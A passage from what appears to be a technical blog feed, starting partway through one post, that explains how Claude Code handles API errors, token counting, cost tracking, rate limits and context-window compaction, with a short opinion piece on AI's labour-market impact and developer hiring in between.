PDF exceeds page limit	Size limit shown	Reduce pages
Image too large	Dimension limit shown	Resize
Bedrock model access denied	Model access guidance	Request access
Request timeout	"Request timed out"	Retry

Messages are context-sensitive. Interactive sessions show keyboard shortcuts ("esc esc" to abort). SDK sessions show generic text. Subscription users get different error messages than API key users. Internal users get a Slack channel link for rapid triage.

Separately, every error gets classified into one of 25 analytics types (rate_limit, prompt_too_long, server_overload, auth_error, ssl_cert_error, unknown, etc.) for aggregate monitoring. This dual classification — human-readable + machine-readable — lets the same error inform both the user and the engineering dashboard.

The 529 Detection Problem

The SDK sometimes fails to pass the 529 status code during streaming. The server sends 529, but by the time the error reaches the client, the status field may be undefined or different. The client works around this by also checking the error message body for the string "type":"overloaded_error". This string-matching fallback is fragile — if the API changes the error format, it breaks — but it catches a real class of misclassified overload errors that the status code alone misses.

Similarly, the "fast mode not enabled" error is detected by string-matching the error message ("Fast mode is not enabled"). The code includes a comment noting this should be replaced with a dedicated response header once the API adds one. String-matching error messages is a known anti-pattern, but when the alternative is failing to detect a recoverable error, fragility is the better trade-off.

Token Counting and Cost Tracking

How Tokens Are Counted

The canonical context size function combines two sources:

API-reported usage: Walk backward through messages to find the last assistant message with a usage field. This is the server's authoritative token count at that point.
Client-side estimation: For messages added after the last API response (the user's new message, any attachment messages), estimate tokens using heuristics: ~4 characters per token for text, 2,000 tokens flat for images, tool name + serialized input length for tool use blocks. Pad by 33%.

The estimation is intentionally conservative. Overestimating triggers compaction too early (wastes a few tokens of capacity). Underestimating triggers a prompt-too-long error (wastes an entire API call).

A subtlety with parallel tool calls: when the model makes N tool calls in one response, streaming emits N separate assistant records sharing the same response ID. The query loop interleaves tool results between them: [assistant(id=A), tool_result, assistant(id=A), tool_result, ...]. The token counter must walk back to the FIRST message with the matching ID so all interleaved tool results are included. Stopping at the last one would miss them and undercount.

Cost Calculation

A per-model pricing table maps model identifiers to rates:

sonnet (3.5 through 4.6):  $3 / $15  per million tokens (input/output)
opus 4/4.1:                $15 / $75
opus 4.5/4.6:              $5 / $25
opus 4.6 fast:             $30 / $150
haiku 4.5:                 $1 / $5

Cache reads cost 10% of input price. Cache writes cost 125% of input price. The formula:

cost = (input / 1M) * input_rate
     + (output / 1M) * output_rate
     + (cache_read / 1M) * cache_read_rate
     + (cache_write / 1M) * cache_write_rate
     + web_searches * $0.01

Fast mode pricing is determined by the server, not the client. The API response includes a speed field in usage data. If the server processed the request at standard speed despite a fast-mode request (possible during overload), you pay standard rates. The client trusts this field for billing rather than its own request parameter.

Costs are persisted per-session. On session resume, the client checks that the saved session ID matches before restoring — preventing one session's costs from bleeding into another. Unknown models (new model IDs not yet in the table) fall back to the Opus 4.5/4.6 tier and fire an analytics event so the table can be updated.

Cache Break Detection

A cache break means the server couldn't read the cached prefix and had to re-process all input tokens. On a 100K-token conversation, that's the difference between paying for 5K tokens (cache read) and 100K tokens (full write). Silent cache breaks are an invisible cost multiplier.

The detection system uses two phases:

Pre-call: Before each API call, snapshot the state — hashes of the system prompt, tool schemas, cache control config, model name, speed mode, beta headers, effort level, and extra body parameters.

Post-call: After the response, compare cache read tokens to the previous call's value. If reads dropped by more than 2,000 tokens and didn't reach 95% of the previous value, flag a cache break.

When a break is detected, the system identifies which snapshot fields changed: model switch, system prompt edit, tool schema addition/removal, speed toggle, beta header change, cache TTL/scope flip. If nothing changed in the snapshot, it infers a time-based cause: over 1 hour since last call (TTL expiry), over 5 minutes (short TTL expiry), or under 5 minutes (server-side eviction).

A unified diff file is written showing the before/after prompt state. With debug mode enabled, this makes cache break investigation straightforward — you can see exactly which tool schema changed or which system prompt section grew.

State is tracked per query source with a cap of 10 tracked sources to prevent unbounded memory growth. Short-lived sources (background speculation, session memory extraction) are excluded from tracking — they don't benefit from cross-call analysis.

Rate Limits and Early Warnings

After every API response, the client extracts rate limit headers: status (allowed, allowed_warning, rejected), reset timestamp, limit type (five_hour, seven_day, seven_day_opus), overage status, and fallback availability.

Early Warnings

Before hitting the actual limit, the client warns users who are burning through quota unusually fast:

5-hour window:  warn if 90% used but < 72% of time elapsed
7-day window:   warn if 75% used but < 60% of time elapsed
                warn if 50% used but < 35% of time elapsed
                warn if 25% used but < 15% of time elapsed

The intuition: if you've used 90% of your 5-hour quota but only 3.6 hours have passed, you're on pace to hit the wall. The preferred method uses a server-sent surpassed-threshold header. The client-side time calculation is a fallback.

False positive suppression: warnings are suppressed when utilization is below 70% (prevents spurious alerts right after a rate limit reset). For team/enterprise users with seamless overage rollover, session-limit warnings are skipped entirely — they'll never hit a wall.

Overage Detection

When status changes from rejected to allowed while overageStatus is also allowed, the user has silently crossed from subscription quota to overage billing. The client detects this transition and shows a notification: "You're now using extra usage." This matters because overage has its own cost implications.

Quota Probing

On startup, a test call checks quota status before the first real query: a single-token request to the smallest model. The call uses .with_response() to access the raw headers. This lets the UI show rate limit state immediately rather than waiting for the first user message.

The Full Round-Trip

Putting it all together, here's one API call:

Message preparation: microcompact, autocompact, context collapse
Request construction: system prompt blocks with cache markers, converted messages with cache breakpoints and tool result references, tool schemas, thinking config, beta headers, extra body params
Cache state snapshot: hash system prompt, tools, config
Retry wrapper: up to 10 attempts with exponential backoff
Client creation: provider-specific SDK with auth, headers, fetch wrapper
API call: streaming request with abort signal and client request ID
Stream processing: event-by-event content accumulation, idle watchdog
Tool execution: streaming — start tools as they're emitted, before the response completes
Header extraction: rate limits, cache metrics, request IDs
Cache break analysis: compare pre/post token ratios
Cost tracking: per-model pricing, session accumulation, persistence
Error recovery: 20+ error patterns → specific recovery actions
Query loop: process tool results, append to history, loop back

Each turn takes 2–30 seconds. A typical session makes 50–200 calls. The retry system makes those calls resilient to transient failures. The caching system makes them affordable. The error classification system makes failures actionable. And the token counter keeps track of exactly how close you are to the edge of the context window.

The alternative to this defense-in-depth approach is simpler code that fails in opaque ways — silent cost overruns, mysterious context overflows, and retries that amplify outages instead of weathering them. Every layer described here exists because the simpler version broke in production.

The key architectural choices:

Async generators everywhere: The query loop, the retry wrapper, and the stream processor are all async generators. This means every layer can yield events to the UI without blocking. A retry wait yields countdown messages. A compaction yields summary events. The UI stays responsive through multi-minute operations.
Trust the server's numbers: Token counts come from API usage fields, not local tokenization. Cache status is inferred from token ratios, not server state. Cost is calculated from server-reported speed mode, not the client's request. The client doesn't have a tokenizer — it uses character-based estimation for new messages and cross-checks against the server's count on every response.
Fail visible, not fail silent: Cache breaks are logged with diffs. Cost anomalies fire analytics events. Rate limit transitions trigger notifications. Unknown models get tracked. The system is designed so that degradation is always observable, even if it's not always preventable.
Context over rules: The retry handler doesn't just ask "is this error retryable?" It asks "is this error retryable for THIS user on THIS provider in THIS mode?" A subscriber hitting 429 is different from an enterprise user hitting 429. A remote environment hitting 401 is different from a local user hitting 401. The same status code gets different treatment depending on context the server can't see.

94% Exposed, 30% Adopted: Why Engineering Leaders Need to Rethink How They Hire

Laurent DeSegur — Tue, 07 Apr 2026 15:37:44 +0000

The gap between what AI can do and what it's actually doing is closing. If your hiring process still optimizes for the implementation layer, you're selecting for the part that's being automated.

If you lead a software team, the way you evaluate and hire developers is shifting. Ignore it, and you'll miss strong people or hire for the wrong things.

This isn't theoretical. Anthropic just released labor market data, and it points to a real change in how we should think about technical talent. 94% of coding tasks could be handled by AI. Only about 30% actually are today. That gap is closing, and it's already changing what a "good developer" looks like.

The numbers

Peter McCrory, Anthropic's head of economics, shared more context in Fortune. Their March 2026 report, "Labor Market Impacts of AI: A New Measure and Early Evidence," introduced a framework called "observed exposure" — combining theoretical LLM capability with real-world usage data from Claude.

The top-line numbers stand out:

Occupation	Share of tasks AI can perform
Computer Programmers	74.5%
Customer Service Representatives	70.1%
Data Entry Keyers	67.1%
Medical Record Specialists	66.7%
Market Research Analysts	64.8%
Sales Representatives	62.8%
Financial & Investment Analysts	57.2%
Software QA Analysts & Testers	51.9%
Information Security Analysts	48.6%
Computer User Support Specialists	46.8%

More than 90% of the work done by tech and finance workers could — in theory — be replaced by AI. But the more important story is underneath.

The gap

There hasn't been a clear rise in unemployment for highly exposed roles since late 2022. Adoption in computer and math jobs sits around 33% compared to 94% capability. 30% of workers currently have zero meaningful AI task coverage in the data.

At the same time, job-finding rates for workers aged 22–25 in exposed roles are down 14%. Goldman Sachs estimates around 16,000 U.S. jobs being cut monthly due to AI, with Gen Z feeling it first.

The displacement isn't evenly distributed. It's hitting the youngest workers first — the ones with the least leverage, the smallest networks, and the most to prove.

Implementation vs. judgment

McCrory breaks knowledge work into three parts: asking the right questions, implementation, and expert evaluation. The implementation layer is getting saturated by AI. The other two aren't.

From what I see day to day as a CTO, that tracks.

The developers doing well right now aren't the ones who memorized the most syntax or can write a perfect binary search on a whiteboard. They're the ones who know what to build, can evaluate outputs, and can tell when AI is wrong. Implementation matters less than it used to. Judgment matters more.

That changes how I hire

I'm looking for people who can frame problems clearly, spot when something is off even if it compiles, and guide AI tools without blindly trusting them. People who can think in systems, not just code.

If your hiring process still rewards speed on basic coding exercises, you're optimizing for a layer that's getting automated. The people you actually need don't always stand out in those interviews.

McCrory compared this moment to electricity. The real impact didn't come from simply plugging machines in — it came from reorganizing work around it. We're still early in that shift.

The window

There's a bigger risk in the background. A downturn for white-collar work is possible. Anthropic's own economist has said as much. It hasn't happened yet, but decisions made now will shape whether it does.

That 94% vs. 30% gap isn't a comfort zone. It's a window.

For engineering leaders, using it well means rethinking who you hire, how you evaluate them, and what skills will actually matter soon.

Follow me on X — I post as @oldeucryptoboi.

How Claude Code Manages Infinite Conversations in a Finite Context Window

Laurent DeSegur — Tue, 07 Apr 2026 14:42:45 +0000

Claude Code conversations have no turn limit. You can work for hours — reading files, running tests, debugging, iterating — and the conversation just keeps going. But the model has a fixed context window. At some point, the accumulated messages exceed what the model can process in a single API call.

The system needs to compress the conversation without losing critical context. Here's how it works, from the source code.

The Problem

The naive approach is truncation: drop old messages when the window fills up. This fails immediately. A conversation about building an authentication system might reference a design decision from 50 turns ago. Truncate those turns and the model forgets the decision, re-asks the question, or contradicts what it said earlier.

A better approach: summarize. Replace the old messages with a summary that preserves the essential information. But summarization introduces its own problems:

What to preserve? File paths, code snippets, user preferences, error resolutions, pending tasks — all matter. A generic "summarize this conversation" prompt loses critical details.
When to trigger? Too early wastes context window. Too late risks hitting the hard limit and failing the API call.
What about the cache? Anthropic's API caches the prompt prefix. Compaction replaces all messages, invalidating the cache. Every token in the new prompt is a cache miss — expensive.
What if the summary itself is too long? If the conversation is so large that even the compaction request exceeds the context window, you need a fallback.

Claude Code solves these with a three-tier system. Microcompact clears stale tool results without calling the model. Full compact summarizes the entire conversation with a dedicated model call. Session memory compact uses pre-extracted notes to skip the summarization call entirely. Each tier is progressively more aggressive and more expensive.

When to Compact

The Threshold

Auto-compact fires when the conversation's token count exceeds a threshold. The threshold is calculated as:

effectiveWindow = contextWindow - max(maxOutputTokens, 20_000)
autoCompactThreshold = effectiveWindow - 13_000

For a 200K context window model, this works out to roughly 167K tokens. The 20K reserve ensures the model has room to generate the summary. The 13K buffer provides headroom — the system checks BEFORE each API call, so the actual token count may grow by a full model response between checks.

The threshold can be overridden via environment variables for testing. A percentage-based override lets you trigger compaction earlier (useful for observing the system's behavior on shorter conversations).

Token Counting

The canonical function for context size is tokenCountWithEstimation. It works in two parts:

Find the last API response: Walk backward through messages to find the most recent assistant message that has a usage field (reported by the API). This gives the exact token count at that point in the conversation.
Estimate new messages: For any messages added AFTER the last API response, estimate their token count. Text blocks use a rough length / 4 heuristic (one token per ~4 characters). Images and documents get a flat 2,000-token estimate. Tool use blocks count the tool name plus JSON-serialized input. The total estimate is padded by 4/3 (33% conservative buffer). Add this to the API-reported count.

A subtlety: when the model makes multiple parallel tool calls, each becomes a separate assistant message interleaved with tool results. The messages look like: [..., assistant(id=A), toolResult, assistant(id=A), toolResult, ...]. All of these share the same message ID because they came from one API response. The token counter must walk back to the FIRST message with matching ID to anchor correctly — stopping at the last one would miss the interleaved tool results and undercount.

The total context count includes input tokens, cache creation tokens, cache read tokens, and output tokens. This represents the actual context window consumption, which is what matters for threshold comparison. Using only input_tokens would undercount because cached tokens still occupy the window.

The Circuit Breaker

If compaction fails three times consecutively, auto-compact stops trying. This circuit breaker prevents runaway API costs. Before the breaker, telemetry showed 1,279 sessions with 50+ consecutive failures, wasting approximately 250,000 API calls per day. The breaker resets on any successful compaction.

Recursion Guards

Auto-compact skips triggering when the query source is compact (would deadlock — compaction triggering compaction) or session_memory (would deadlock — memory extraction happens in a forked subagent that shares the token counter).

Tier 1: Microcompact

Microcompact is the cheapest intervention. No model call. No summarization. It just clears old tool results that the model no longer needs, reclaiming tokens.

Time-Based Clearing

The API prompt cache has a TTL of roughly one hour. When the user returns after an idle period, the entire cached prefix is gone — every token will be re-processed anyway. This is the ideal time to clear stale tool results, because there's no cache to preserve.

The trigger:

gap = (now - lastAssistantMessage.timestamp) / 60_000
if gap > gapThresholdMinutes (default: 60):
  clear old tool results

"Clear" means replacing the content of tool_result blocks for compactable tools (file reads, shell output, grep results, glob results, web fetches, web searches, edits, writes) with the text [Old tool result content cleared]. The system keeps the N most recent results (default: 5) and clears the rest.

This is a mutation of the message array. The cleared results are gone. But since the cache was already expired, there's no cost — the full conversation will be re-tokenized regardless.

Cached Microcompact

When the prompt cache is still warm, mutating messages would invalidate the cached prefix. Instead, the system uses the API's cache_edits feature to delete tool results server-side. The local message array stays unchanged, but the API receives a cache_edits block that instructs the server to remove specific tool results by their cache reference IDs.

The state machine tracks three things:

registeredTools: Set of all tool_use IDs seen (deduplicated)
toolOrder: List of tool_use IDs in encounter order (FIFO for deletion priority)
deletedRefs: Set of IDs already deleted (prevents re-deletion)

The logic:

activeTools = toolOrder filtered by NOT in deletedRefs
if activeTools.length < triggerThreshold (default: 12):
  return (not enough tools to justify clearing)

toDelete = activeTools[0 .. activeTools.length - keepRecent]
for each id in toDelete:
  add to deletedRefs
  create cache_edit { type: "delete", cache_reference: id }

queue as pendingCacheEdits (applied at API layer)

The cache edits are "pinned" — once queued, they're re-sent on every subsequent API call for as long as the cache hit persists. This is necessary because cache edits are relative to the cached prefix, not absolute. If the server cache is hit, the pinned edits tell it which blocks to skip.

If the cache expires (detected by a drop in cache_read_input_tokens), the pinned edits become stale. The system falls through to time-based clearing on the next idle gap. The pinned edits are also cleared during full compaction's post-compact cleanup.

The system also captures the baseline cache_deleted_input_tokens from the last assistant message. This baseline is needed by the cache break detection system — without it, the token drop from cached edits would trigger a false "cache break" warning.

Compactable Tools

Not all tool results are safe to clear. The system maintains an allowlist:

File reads — the file can be re-read
Shell output — the output is ephemeral
Grep/glob results — search results can be re-run
Web fetch/search — fetched content can be re-fetched
File edits/writes — the confirmation output is disposable

Tool results from other tools (like user questions, notebook edits, or task management) are NOT cleared — their content may be unreproducible.

API-Native Context Management

Beyond local microcompact, the system can also request that the API itself manage context. This uses the context_management field in API requests to specify edit strategies:

Tool result clearing: When input tokens exceed a trigger threshold (default: 180K), the API clears tool results from specific tools (file reads, shell output, grep, glob, web fetches, web searches), keeping the most recent results up to a target token budget (default: 40K). The clear_at_least parameter ensures a minimum number of tokens are freed — clearing one small tool result when the context is at 180K wouldn't help.

Tool use clearing: A separate strategy for edit/write tools. Rather than clearing their inputs, it excludes their entire tool_use blocks. The distinction matters: for read-like tools, the large output (file content, shell output) is the waste. For write-like tools, the large input (new file content) is the waste.

Thinking clearing: For models with extended thinking, old thinking blocks are the largest tokens-per-message contributor. When the user has been idle for over an hour (cache expired anyway), only the last thinking turn is kept. During active use, all thinking turns are preserved.

These strategies compose — multiple edit strategies can be active simultaneously, each targeting a different category of clearable content.

Tier 2: Full Compact

When microcompact isn't enough — the conversation has genuinely grown past the threshold — the system performs a full compaction. This calls the model to summarize the entire conversation history.

Pre-Processing

Before the conversation is sent for summarization, two pre-processing steps run:

Image stripping: All image and document blocks are removed from user messages, replaced with an [image] text marker. Images are large (potentially thousands of tokens each) and not useful for text summarization. The stripping also handles images nested inside tool_result content arrays — a tool might return screenshots that are irrelevant to the summary.

Attachment stripping: Skill discovery and skill listing attachments are removed before summarization. These are re-injected post-compact anyway, so including them in the summarization input wastes tokens — the model would summarize content that's about to be restored verbatim.

The Summarization Prompt

The prompt is the most interesting part. It demands a specific structure:

CRITICAL: Respond with TEXT ONLY. Do NOT call any tools.
- Do NOT use Read, Bash, Grep, Glob, Edit, Write, or ANY other tool.
- Tool calls will be REJECTED and will waste your only turn — you will fail the task.
- Your entire response must be plain text: an <analysis> block followed by a <summary> block.

This preamble appears at both the START and END of the prompt (dual-instruction pattern). Why? Models with adaptive thinking sometimes attempt tool calls during summarization despite single instructions. The duplication makes non-compliance less likely.

The prompt then requires nine specific sections in the summary:

Primary Request and Intent — All explicit user requests and intents, in detail.
Key Technical Concepts — Important technologies, frameworks, and architectural decisions.
Files and Code Sections — Every file examined, modified, or created, with full code snippets and rationale.
Errors and Fixes — Every error encountered and how it was resolved.
Problem Solving — Problems solved and ongoing troubleshooting approaches.
All User Messages — ALL non-tool-result user messages. Critical for understanding feedback and corrections.
Pending Tasks — Explicitly requested tasks that haven't been completed.
Current Work — Precise detail of work immediately before summarization, with filenames and code snippets.
Optional Next Step — The next step in line with recent requests, with direct quotes showing task status.

Section 6 ("All user messages") is the most unusual. Summarization typically abstracts away individual messages. But user messages contain corrections ("no, I meant X"), preferences ("always use bun"), and implicit context that a summary might smooth over. Preserving them verbatim prevents the model from drifting away from what the user actually said.

Section 9 requires "direct quotes" from the conversation to justify the suggested next step. This prevents task drift — without quotes, the model might hallucinate a next step that wasn't actually in progress.

The Analysis Scratchpad

The prompt asks for TWO blocks: <analysis> then <summary>. The analysis block is a drafting scratchpad — the model walks through the conversation chronologically, identifying requests, decisions, code changes, and errors. This structured thinking improves the quality of the summary that follows.

But the analysis block is stripped before delivery. formatCompactSummary removes everything between <analysis> tags, extracts the <summary> content, and replaces the tags with a "Summary:" header. The user never sees the scratchpad. It exists purely to improve the summary via chain-of-thought reasoning.

Prompt Cache Sharing

The summarization call sends the entire conversation as context. Normally this means re-tokenizing everything — expensive. But the main conversation's prompt prefix (system prompt, tools, early messages) is already cached from the most recent API call.

The system uses a "forked agent" to reuse this cache. The fork inherits the main conversation's cached parameters (system prompt, tool definitions, user context) and sends them as identical cache-key parameters, so the summarization call gets a cache hit on the shared prefix. The remaining messages (the ones being summarized) are the only new tokens.

A critical constraint: the fork must NOT set maxOutputTokens. Setting it would clamp the thinking budget via a formula in the API client, creating a thinking config mismatch that invalidates the cache key. The forked agent uses the model's default output limit. Since compaction is capped at one turn (maxTurns: 1), the output naturally stays within bounds.

The fork also skips writing to the prompt cache (skipCacheWrite: true) — its response is ephemeral and caching it would waste cache creation tokens. The fork's tool permissions are locked to deny-all (createCompactCanUseTool), ensuring the model produces only text, never tool calls.

If the fork fails, the system falls back to a direct streaming call with the compact-specific output cap (20K tokens). Telemetry tracks the cache hit rate to monitor effectiveness — a 98% miss rate in the fork path would cost ~0.76% of fleet-wide cache creation, concentrated in ephemeral environments with cold caches.

During the summarization call, the system sends keep-alive signals every 30 seconds — a session activity signal plus a "compacting" status update. This prevents WebSocket timeouts in IDE integrations where the compaction call might take 30-60 seconds for large conversations.

Hooks

The compaction system fires four hook events that users can subscribe to:

PreCompact — runs before summarization. Returns optional custom instructions that are merged with the user's instructions. User instructions come first, hook instructions appended.
PostCompact — runs after compaction completes.
SessionStart — runs after compaction to re-trigger initialization logic (CLAUDE.md reload, etc.).

These hooks allow plugins and IDE integrations to inject context, clear their own caches, or perform cleanup. Hook results are included in the post-compact message array as hookResults.

Three Prompt Variants

The system has three compaction modes:

Full compact: Summarize the entire conversation. Used by auto-compact and /compact.
Partial compact ("from"): Summarize only messages after a selected point, preserving earlier messages. Preserves the prompt cache (early messages stay).
Partial compact ("up_to"): Summarize messages before a selected point, keeping later messages. Invalidates the prompt cache (the kept messages move to the end).

The "from" variant adds: "Earlier retained messages are NOT re-summarized." The "up_to" variant changes section 8 from "Current Work" to "Work Completed" and adds "Context for Continuing Work" — since newer messages follow the summary, the summary needs to set up context rather than continue work.

The Prompt-Too-Long Retry Loop

Sometimes the conversation is so large that the compaction request itself exceeds the context window. The system handles this with a retry loop:

for attempt in 1..MAX_PTL_RETRIES (3):
  try:
    stream summary
    return result
  catch PromptTooLong:
    messages = truncateHeadForPTLRetry(messages, errorResponse)
    if messages is null:
      throw "Conversation too long. Press esc twice to go up a few messages and try again."

truncateHeadForPTLRetry groups messages by API round (one group per model response with its tool results). It calculates how many tokens to drop based on the error response's token gap. If the gap is unparseable (some Vertex/Bedrock error formats), it falls back to dropping 20% of groups. It drops the oldest groups first.

A subtle self-referential bug was fixed: the function strips its own synthetic marker from a previous retry before grouping. Otherwise the marker becomes its own group at index 0, and the 20% fallback stalls — it drops only the marker, re-adds it on the next retry, and makes zero progress. The fix checks if the first message is the marker (by content match and isMeta flag) and strips it before grouping.

If the truncated messages would start with an assistant message (violating the API's alternation requirement), a synthetic user message is prepended: [earlier conversation truncated for compaction retry].

If ALL groups would need to be dropped (nothing left to summarize), the function returns null and the user sees an error message suggesting they press Escape to go back a few messages.

Post-Compact: What Survives the Boundary

After summarization, the old messages are replaced wholesale. The new message array is:

[
  boundaryMarker,        // System message marking the compaction point
  ...summaryMessages,    // The formatted summary as a user message
  ...messagesToKeep,     // Preserved messages (partial compact only)
  ...attachments,        // Re-injected context
  ...hookResults,        // User hook output
]

The Boundary Marker

A system message that records metadata about the compaction:

trigger: "manual" (user ran /compact) or "auto" (threshold exceeded)
preTokens: token count before compaction (for analytics)
messagesSummarized: how many messages were replaced
logicalParentUuid: UUID of the last pre-compact message (enables fork/rewind to find the original conversation)
preCompactDiscoveredTools: tool names seen before compaction (for re-announcing)
preservedSegment: head/anchor/tail UUIDs (for partial compact message relinking)

The boundary is the anchor point. Everything before it is gone (replaced by the summary). Everything after it is the new conversation.

Cache Break Detection

After compaction, the prompt cache baseline is stale. The token count drops legitimately — old messages were replaced with a shorter summary. Without intervention, the cache break detection system would see the drop in cache_read_input_tokens and flag a "cache break" warning.

The fix: notifyCompaction() resets the previous cache read baseline to null. The next API call establishes a fresh baseline. The detection system compares subsequent calls against this new baseline, ignoring the compaction-induced drop.

The cache break detector itself uses dual thresholds: a drop must be both >5% of the previous cache read AND >2,000 tokens to be flagged. Small fluctuations from server-side cache management are ignored.

Re-Injected Attachments

The system generates attachments in parallel to restore context that the summary might have compressed too aggressively:

Recently-read files — The 5 most recently accessed files are re-read with fresh content (not cached — the file may have changed since it was first read). Each file is capped at 5,000 tokens, with a total budget of 50,000 tokens. Plan files and memory files (CLAUDE.md) are excluded — they have their own injection paths via the system prompt.

The file selection uses recency ordering from the file read state tracker. Files already present in preserved messages (partial compact) are skipped to avoid duplication. The deduplication scans preserved messages for Read tool_use blocks and collects their file paths. It also skips files that had the "FILE_UNCHANGED" stub (a deduplication marker that points at an earlier full read of the same file).

Each file is re-read via the actual File Read tool at restoration time. This means the restored content reflects the file's CURRENT state, not its state when it was first read. If the model edited a file 30 turns ago and the file was later modified by other tools, the post-compact restoration shows the latest version.

Active skills — Skills invoked during the session are preserved, sorted most-recent-first. Each skill is capped at 5,000 tokens (truncated with a marker telling the model it can re-read the full content). Total budget: 25,000 tokens.

Plan file — If a plan exists for the current session, it's re-injected as an attachment.

Plan mode — If the user is currently in plan mode, an attachment ensures the model continues in plan mode after compaction.

Async agent status — Background agents that are still running or recently finished get status attachments. This prevents the model from spawning duplicate agents after losing the original creation context.

Tool deltas — The full tool set is re-announced. After compaction, the model needs to know what tools are available — the original tool announcements from earlier in the conversation are gone.

MCP instructions — Model Context Protocol tool instructions are re-injected for any MCP servers with deferred tool loading.

Post-Compact Cleanup

After compaction, 10+ caches are cleared because their contents reference pre-compact state:

Microcompact tracking state (tool IDs no longer valid)
User context cache (forces CLAUDE.md reload and InstructionsLoaded hook)
Memory file cache (allows fresh memory file detection)
System prompt sections (may reference pre-compact state)
Classifier approvals (permissions may have changed)
Bash permission speculative checks (stale command analysis)
Session messages cache (old messages gone)
Beta tracing state
File content cache (for commit attribution)

The cleanup is careful about main-thread vs. subagent scope. Subagents run in the same process and share module-level state with the main thread. Clearing state during a subagent compaction would corrupt the main thread. The cleanup checks the query source prefix (repl_main_thread or sdk) before resetting shared state.

One deliberate non-clear: the set of sent skill names. Re-injecting the full skill listing post-compact costs ~4,000 tokens of pure cache creation. The model still has the skill tool in its schema, and the invoked_skills attachment preserves content for used skills. Skipping re-injection saves tokens on every compaction.

Auto-Compact Orchestration

The auto-compact flow ties everything together:

function autoCompactIfNeeded(messages):
  if consecutiveFailures >= 3 → return (circuit breaker)
  if not shouldAutoCompact(messages) → return

  // Try session memory compaction first (cheap, no model call)
  result = trySessionMemoryCompaction(messages)
  if result:
    cleanup, return success

  // Fall back to full compaction (expensive, model call)
  result = compactConversation(messages,
    suppressFollowUpQuestions = true,
    isAutoCompact = true)
  if result:
    cleanup, reset failures to 0, return success

  // Failure: increment circuit breaker
  consecutiveFailures++
  if consecutiveFailures >= 3:
    log "circuit breaker tripped"

When auto-compact triggers, it suppresses follow-up questions. The model receives: "Continue without asking user further questions. Resume directly — do not acknowledge summary, do not recap, do not preface. Pick up last task as if break never happened." This prevents the jarring experience of the model suddenly asking "Would you like me to continue?" mid-task.

In autonomous/proactive mode, the continuation message is even stronger: "You are running in autonomous mode. This is NOT first wake-up. Continue work loop — pick up where you left off. Do not greet or ask what to work on."

For manual /compact, the user can provide custom instructions (e.g., "focus on the authentication work") that are appended to the summarization prompt.

Recompaction Tracking

The system tracks compaction chains — situations where auto-compact fires, the conversation grows past the threshold again, and auto-compact fires a second time. Each compaction records:

Whether this is a recompaction in a chain
Turns since the previous compaction
The previous compaction's turn ID
The auto-compact threshold that triggered it
The query source that was active when triggered

This metadata feeds into telemetry for monitoring compaction quality. If compaction produces summaries that are too verbose (consuming too many tokens), the conversation will recompact quickly — a signal that the summarization prompt needs tuning.

Tier 3: Session Memory Compact

Full compaction is expensive — it sends the entire conversation to the model and waits for a summary. Session memory compaction is an experimental alternative that skips the model call entirely.

How Session Memory Works

Throughout the conversation, a background process periodically extracts "session memory" — a structured markdown file with sections like Current State, Task Specification, Files and Functions, Errors & Corrections, and a Worklog.

The extraction triggers based on two conditions:

trigger = (tokenGrowth >= minimumTokensBetweenUpdate)
          AND (toolCalls >= toolCallsBetweenUpdates OR noToolCallsInLastTurn)

The extraction runs in a forked subagent — isolated from the main conversation, using the API's cache-safe parameters to avoid polluting the main prompt cache. The forked agent can ONLY use the file edit tool, and only on the session memory file. It reads the current notes, the recent conversation, and updates the file.

Section sizes are enforced: 2,000 tokens per section, 12,000 tokens total. If a section exceeds its limit, the extraction prompt includes a reminder to condense. This prevents the session memory file from growing without bound.

Using Session Memory for Compaction

When auto-compact triggers, it tries session memory compaction first:

function trySessionMemoryCompaction(messages):
  if feature disabled → null
  if no session memory file → null
  if session memory is empty template → null

  wait for any in-progress extraction to complete

  calculate which messages to keep (most recent, meeting minimum thresholds)
  adjust keep-index to preserve API invariants (tool_use/result pairs, thinking blocks)

  create compaction result using session memory as the summary
  estimate post-compact token count

  if postCompactTokens >= autoCompactThreshold → null  // Would immediately re-trigger
  return result

The "messages to keep" calculation balances recency against token budget:

start from first unsummarized message
if already at maxTokens (40K): stop
if already meeting minTokens (10K) AND minTextBlockMessages (5): stop
otherwise: expand backward until one of above conditions met
floor: most recent compact boundary (can't go before it)

The API invariant adjustment ensures the keep boundary doesn't split tool_use/tool_result pairs or thinking blocks that share the same message ID. It walks backward to include any orphaned pairs.

The token count estimate guards against a pathological loop: if the post-compact token count would already exceed the auto-compact threshold, the system rejects the result and returns null. Without this guard, session memory compaction would succeed, the next turn would trigger auto-compact again (because the kept messages are too large), triggering another session memory compact, and so on.

Session memory compaction is significantly cheaper — no model call, no 20K output token generation. But it depends on the quality of the pre-extracted notes, which may miss nuances that a dedicated summarization call would capture.

The Session Memory File Format

The extraction prompt defines a structured markdown template with ten sections:

Session Title — 5-10 word title
Current State — pending tasks, next steps
Task Specification — what the user asked, design decisions
Files and Functions — important files and why they're relevant
Workflow — bash commands, execution order, interpreting output
Errors & Corrections — encountered errors and their fixes
Codebase and System Documentation — important components, how they fit together
Learnings — what worked, what to avoid
Key Results — exact user-requested output
Worklog — step-by-step summary of work done

Each section is capped at 2,000 tokens. The total file is capped at 12,000 tokens. When a section grows past its limit, the extraction prompt includes a reminder: "section must be condensed." When the total exceeds 12,000: "CRITICAL: file exceeds max, aggressively shorten."

Before including session memory in a compaction result, the content is further truncated via truncateSessionMemoryForCompact. This truncates each section to ~2,000 tokens (8,000 characters), preserving section headers and italic descriptions. An overflow marker tells the model it can read the full file if needed.

The Fallback Chain

The full compaction fallback chain is:

Session memory compact — cheapest, fastest, depends on extraction quality
Full compact with prompt cache sharing — expensive but thorough, reuses cached prefix
Full compact streaming — fallback if cache sharing fails
PTL retry with head truncation — if compact itself exceeds context window
User error message — "Press esc twice to go up a few messages and try again"

Each tier is tried only when the previous one fails or is unavailable.

The Cost Model

Stage	Input Tokens	Output Tokens	Latency
Microcompact (cached)	0	0	~0
Microcompact (time-gap)	0	0	~0
Session memory compact	0	0	~0
Full compact	~167K	up to 20K	1 model turn

For full compact at the 200K threshold: 167K tokens of old history become ~20K tokens of summary plus rehydrated attachments. Net savings: ~147K tokens. The cost is one model turn's latency plus the input/output token charges for the summarization call.

Microcompact and session memory compact are essentially free — no model call, no token charges. They exist to defer the expensive full compact as long as possible.

The Full Round-Trip

To understand how the pieces fit together, trace one complete auto-compact cycle through the system:

1. The REPL starts the query loop. When the user sends a message, REPL.tsx calls the query() generator, which yields messages as they arrive. The REPL consumes them via for await (event of query(...)) and appends each to the UI.

